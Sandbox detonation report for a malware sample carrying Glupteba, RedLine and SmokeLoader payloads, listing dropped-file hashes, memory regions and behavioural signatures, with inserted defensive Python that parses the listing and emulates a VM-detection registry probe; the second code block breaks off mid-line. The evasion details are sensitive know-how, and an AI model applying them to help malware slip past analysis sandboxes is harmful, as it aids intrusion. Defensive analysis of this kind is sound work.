| SHA1 | 69e6d745c078011b171356b1257806a6e6bd1cfe |
| SHA256 | 6556af10ea7818bee690b6e39844a2ddc3a42bff4cf27434584de666ef7e459b |
| SHA512 | f2686a91185d8500ee47df031a996e8143d3fd994283c9792e5992870e5cf67003dafdfd74694ac9f358b1e843fc93d34a559c6ba226ac4744f628f3115b4415 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 293e59cd9eb8aa3a3f1d7af37e83d4d8 |
| SHA1 | 0c334cf435a195e9377670c6178ea42699e92a23 |
| SHA256 | 2e0121034d468361d66406c7328386e8d415d8292c81a40ff630e09e9a58bb3a |
| SHA512 | 0b05ad68666ca7cb77638a42ff32f4b5ad9fd801346573c4febb1d1c4bcca18d067f7c593f433eb5e579d97d7d89d3b36dce68dafecc6e6e5870870099dc9999 |
memory/1224-284-0x000000000298B000-0x00000000029F2000-memory.dmp
memory/1224-283-0x0000000002980000-0x0000000002A00000-memory.dmp
memory/1224-281-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1224-279-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/784-349-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\88AD.exe
| MD5 | c2f14d3e4cf4ad8cd024528f948651d0 |
| SHA1 | 30d7c66ef087c3740f5960008ab44200d85afb23 |
| SHA256 | 21c96a6163eeafc0fdc2dd0c8e3a27887c5ef76cf684ebff4a9240af91267136 |
| SHA512 | 6b8aff9790eee6ad59749fca035933f5845828ee7fb897e865f0817272bad8a1c81cad8f0ddd3fe5fa85c2eb7ea190a38e4af506e4903f60c6d6af3088a879f7 |
memory/556-355-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-359-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-362-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-366-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-367-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-365-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-364-0x0000000000BB0000-0x000000000167A000-memory.dmp
memory/556-363-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-361-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-356-0x00000000758D0000-0x00000000759E0000-memory.dmp
memory/556-354-0x0000000000BB0000-0x000000000167A000-memory.dmp
memory/1980-383-0x000000013FF70000-0x0000000140511000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A801.exe
| MD5 | 14e3340de2479096b23458b6a8c3eccf |
| SHA1 | eba2c5cb9303afe8a9f84157998a57dd5b4fc774 |
| SHA256 | 84ba963c2c7d2c335b5c53c844596a648936923e12c1ea4df9886206ca4107c5 |
| SHA512 | 9152863446c4a8ca54307e7d9bb471974b11f2b76fdb104b2f199fea7f598b66c4ceef1283645747e1b838b8637be94e9deb32c7bf1dfe794699ab2c995fb3a4 |
C:\Users\Admin\AppData\Local\Temp\A801.exe
| MD5 | f8ae893e93340b3df2ee3120d9169c3d |
| SHA1 | 623d457b6d1197ebb75a2e192b4567b2c0784701 |
| SHA256 | e5653e3aed1181119b27ae4886fef78d074853fd269e518dd5d6c3bea7c269c6 |
| SHA512 | 3b0f9c5cfa8ca2c56af371b8e18627998af90e487957f9a1dee1b7684de96622917dc324382f263e3b9b132c9400b7483e2eb17a226ab513a829560cc18a075e |
memory/2440-390-0x00000000002C0000-0x0000000000351000-memory.dmp
memory/2148-394-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A801.exe
| MD5 | fe0706bc5800288c2eed152bc9577627 |
| SHA1 | 62a79e527f962a4dcd5681632d8f0107f967a82f |
| SHA256 | 5967c0bcd29f1089a118ef1706226a2d03800b4e23b50dfed127744d91cb877b |
| SHA512 | b69e82785e7696e105b6e76d3392d1fd4db4a0d752f3d57bcd6f860ae2c4be67cd76a1b2c6bb81e97956d93306829e04517be2361541d804ace421222d56799d |
memory/2148-401-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2148-397-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\A801.exe
| MD5 | acce4608ad8dc168b91b8d04fe6d1863 |
| SHA1 | 2999c35b5acc85ce1ba29d04cde3055a9f49c9f2 |
| SHA256 | a601607df480ae53808520cb77de552a07aa43e1d897ed02328207a34699a07a |
| SHA512 | 1383b506e08949b10f4cbfcba8fe3dbc8bdee3f0ad91ca3c20a61e9bcb1cb6b94e3d04b382361df41058314c90b49eedc34c1c762e1e2c6cd7543dd90c50d86e |
\Users\Admin\AppData\Local\Temp\A801.exe
| MD5 | ea13287dc6bf516d1c69b8cecb8e4fa3 |
| SHA1 | 9194ab3f12de4e1d54ff123620664858154c7a8a |
| SHA256 | 6fde81e18510dbeb8c0a732c72035cbe0e354885e26f0110fddcb4aedeb8cfba |
| SHA512 | 292c94af7dd2da21720ee446bd0ccd6672308e1ddec969db38d4ed3ade02da3e8091bdbb3139b5bb8f851571960afe58175ada7c64a0407de7c833f90c69bfa3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c57c7dcc7ccba03b7120bd1a9c7a360a |
| SHA1 | 1131db2ac014fef498773fed63d483b8c8b919b1 |
| SHA256 | 3b3bae70509ee6c52edf4fac6c0ec4ec1b3282fb289f62b2b10115b4d9a43f84 |
| SHA512 | aefdc636a7cb50e434a009849635932bb804c42dbe6c38408e4ada5db1b65e37d08ca3d38098c8285555b1f0d5757990d70832bcc17a8c157477b0a723a2619f |
C:\Users\Admin\AppData\Local\0dc616c6-eb31-4468-86e7-ba6f386b92f4\A801.exe
| MD5 | d1307a1519b33d366ddbb44c00b17823 |
| SHA1 | 9172c376d10d5efbb8a71c25c3bf5b6ef5e25941 |
| SHA256 | 796fa0ca11c954b5ef1e48f9f3ee531f8f2547d6f57d69f5eb4a69d55700a2eb |
| SHA512 | 1f8d866a8b5ae27e7384c836523c8d95bdf1161af912f638a2a4bc3838360894dfb2a762860e6bafe57926d65fe82f0e6c4809875e34869faf146fc3815444d1 |
memory/2148-422-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\Temp\A801.exe
| MD5 | cb9c0e031b66ebc72cf5f0ae427d7be8 |
| SHA1 | addc6823db0e1a2dadd1bc55964b9796a8bbeabe |
| SHA256 | 57d980514ed74841448161cb3e8a8ac232e6b480c562f2d0c0a0370121ceaa14 |
| SHA512 | 8d76740411f73184082d048f5a4be285647f321b2ff6bfba7cd0c859de26a5907156a25d00e4b38f5e2e8a225890de7abf78c10db7913df8d0629d395bf48ae4 |
memory/2332-424-0x0000000000220000-0x00000000002B1000-memory.dmp
memory/784-430-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2288-446-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-445-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-465-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-468-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2288-467-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | 05de097ef8b1e444f23f1a1af553f00b |
| SHA1 | cb1840aec95386161e9ae83d8652f9d2f700cfa0 |
| SHA256 | 6f898080d2a482dd8b5fb5062576c6d5ef3d9b0ebdb38de5c5ec53b5f6dcd1b1 |
| SHA512 | 6c41ad83c8c6707517d29c51ac4b65516e394032fe2f360ba5a556cb963c9307c1b5461ce24085afeafd34b5291cd9ff27ce02b6f9854d8516231ba5d6fc06b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 78430c931df9506c16d1f104d45146a1 |
| SHA1 | fc9cc77803483da463cb6a749d0a736d6202730c |
| SHA256 | 8d6d153555d4c9e551c058dd2ec0ea62dc109bf1105aaee441122f8aadeaf90c |
| SHA512 | 0b1fc97e0c579be126ccc9dc84d147623b55ad1cfa8004405c42a9e1fd49f45f3cac0d1bf9e13dca94d75980a8c1d404a3aed651bdc180feb9b2c57913de8811 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 15eb6a0a73d63add20b76f716f66b924 |
| SHA1 | 765ce3d5271c1d924df404c075218a279d8bae8d |
| SHA256 | a00dbef09e2a13c959199d60094c04197b98a20247872d0d1934cb757d2d3d09 |
| SHA512 | 6864e70d14ba6e87d8eacf7a4a0e130dfa1e9370aba44a1ce1d69dabe2ed083a1925f5bf8192e98d142d9c279429d678e36fe6af186276931e536bfaa648815d |
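The listing above mixes two record types: a dropped-file path followed by a four-row digest table, and `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` names for dumped regions. The following Python is an added example for working with that listing, not part of the report or of the sample's own code: it parses both record types, folds the `C:\...` and `\...` spellings of the same path, reports paths dropped more than once with different content (toolspub2.exe, csrss.exe and A801.exe each appear several times with different digests above), drops the zero-byte digest set so it is never pivoted on, and computes region sizes. The sample input is copied from the entries above with the SHA512 rows left out; the function names and the 0x400000 image-base heuristic are the example's own assumptions.

```python
"""Parse dropped-file digests and memory-region names from a sandbox report listing."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Digests of zero-byte input: an entry carrying exactly these values records a file
# created empty (or dumped before it was written) and is useless as an indicator.
EMPTY_FILE_DIGESTS = {
    "MD5": "d41d8cd98f00b204e9800998ecf8427e",
    "SHA1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    "SHA256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
MEMORY_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")


@dataclass
class DroppedFile:
    path: str
    digests: dict = field(default_factory=dict)

    def is_empty(self) -> bool:
        return all(self.digests.get(alg) == h for alg, h in EMPTY_FILE_DIGESTS.items())

    def normalised_path(self) -> str:
        # The report lists the same file both as C:\... and as \...; fold the two forms.
        return re.sub(r"^[A-Za-z]:", "", self.path).lower()


@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_report(text: str):
    """Split the listing into DroppedFile records and MemoryRegion records."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = MEMORY_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            regions.append(MemoryRegion(int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None
        elif (m := HASH_ROW_RE.match(line)) and current is not None:
            current.digests[m.group(1).upper()] = m.group(2).lower()
        elif "\\" in line:  # a Windows path opens a new dropped-file record
            current = DroppedFile(path=line)
            files.append(current)
    return files, regions


def polymorphic_paths(files):
    """Paths written more than once with different content: the payload was rebuilt per stage or per run."""
    seen = defaultdict(set)
    for f in files:
        if "SHA256" in f.digests:
            seen[f.normalised_path()].add(f.digests["SHA256"])
    return {p: s for p, s in seen.items() if len(s) > 1}


def actionable_sha256(files):
    """Distinct SHA256 values worth pivoting on, with zero-byte placeholders dropped."""
    return sorted({f.digests["SHA256"] for f in files if "SHA256" in f.digests and not f.is_empty()})


def image_base_regions(regions, base=0x400000):
    """Regions starting at the classic 32-bit image base (heuristic): where an unpacked or hollowed image usually sits."""
    return [r for r in regions if r.start == base]


# Sample input copied from the report entries above (SHA512 rows omitted for brevity).
SAMPLE_REPORT = r"""
memory/2796-118-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2928-115-0x0000000007180000-0x00000000071C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | d4ad09094d0641969ebee18830efa370 |
| SHA1 | 14dfc5edda6ad1613f851868523a36efec0809c6 |
| SHA256 | 8543f1d8146053fb26d4f692ca7f82fc56a28d8a6f9e5904b8064ed383b302bf |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | fa21349afce08f321ed1b5378c404b1d |
| SHA1 | d01d582e048c070430647830b335db54eaf470fc |
| SHA256 | 059acb7d0d2144ad29c3a668693fe9fb5cdf6501cd82d18a678650ced7824b41 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
"""

if __name__ == "__main__":
    files, regions = parse_report(SAMPLE_REPORT)
    print("actionable SHA256:", actionable_sha256(files))
    print("same path, different content:", polymorphic_paths(files))
    for r in image_base_regions(regions):
        print(f"pid {r.pid}: image-base region of {r.size:#x} bytes")
```

Feed the whole listing to `parse_report` and the `polymorphic_paths` output gives the set of digests to block per path, while `image_base_regions` points at the dumps most worth unpacking first (the 0x400000 regions of PIDs 2796, 972 and 784 above are all the same 0x91C000 bytes, which is what one expects from one payload re-staged through several processes).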
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-11 10:55
Reported
2023-12-11 10:57
Platform
win10v2004-20231127-en
Max time kernel
121s
Max time network
155s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9438.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9630.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9438.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A04F.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tuc3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\xrecode3\xrecode3.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\xrecode3\xrecode3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4632 set thread context of 3356 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JR7S3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-UHCH4.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TKQK2.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-J225L.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-6HA0E.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-O09NH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-LKG32.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-OPU6H.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JTNOC.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-T4H87.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-PG79Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-56FP5.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-P7QHH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-7A8FF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-VP10Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-HTCD4.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JS30A.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-UA3CG.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-2R912.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TONQ3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-AC188.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-75DRS.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-SC8LN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-HNVCA.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-NRF0U.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-M3DEL.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-C1LN7.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-8E9TH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-N29E6.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TUP7T.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-773TJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-S6NSF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-FLJO1.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\is-DFEK0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-GS1DF.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-H37O2.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-M60G9.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-Q3N15.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\lessmsi\is-HNIOE.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-P4P8Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\install\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-SKAJ1.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-4TASE.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\install\is-9TPRH.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-19AA3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\xrecode3\install\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-08BFP.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-GQ6OM.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-33U2U.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-SDNEI.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-PIJ7J.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-34674.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-JAT3P.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\stuff\is-74KT5.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-205VN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-53DRO.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-GFECJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-537HK.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-TAJQS.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\xrecode3\xrecode3.exe | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-01OB0.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-IIB1J.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
| File created | C:\Program Files (x86)\xrecode3\bin\x86\is-V9BA3.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
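The two registry tables above record host fingerprinting rather than persistence: the `Control Panel\International\Geo\Nation` read returns the configured country, and opening, querying and enumerating `HKLM\SYSTEM\ControlSet001\Enum\SCSI` exposes the storage stack, because each subkey there is a PnP device ID built from the disk's SCSI inquiry vendor and product strings, which on a hypervisor commonly name it. The following Python is an added example, not code from the report or from the sample: it decodes those subkey names and flags the ones an evasive sample would recognise, so an analyst can audit a sandbox's disk identity before detonation. The marker list and the sample subkey names are the example's own assumptions; on a Windows host `live_scsi_subkeys()` performs the same read the sample does.

```python
"""Emulate the disk-identity probe behind the 'Checks SCSI registry key(s)' signature."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

try:  # only available on Windows; the offline sample below does not need it
    import winreg
except ImportError:
    winreg = None

# Strings hypervisors commonly leave in SCSI inquiry data (assumption: a typical
# analyst list, not one recovered from this sample). Matched case-insensitively.
HYPERVISOR_MARKERS = ("vmware", "vbox", "virtualbox", "qemu", "virtio", "xen", "msft virtual", "parallels")

# Subkeys of HKLM\SYSTEM\ControlSet001\Enum\SCSI are PnP device IDs of the form
# <Class>&Ven_<vendor>&Prod_<product>[&Rev_<rev>], with spaces encoded as '_'.
SCSI_ID_RE = re.compile(
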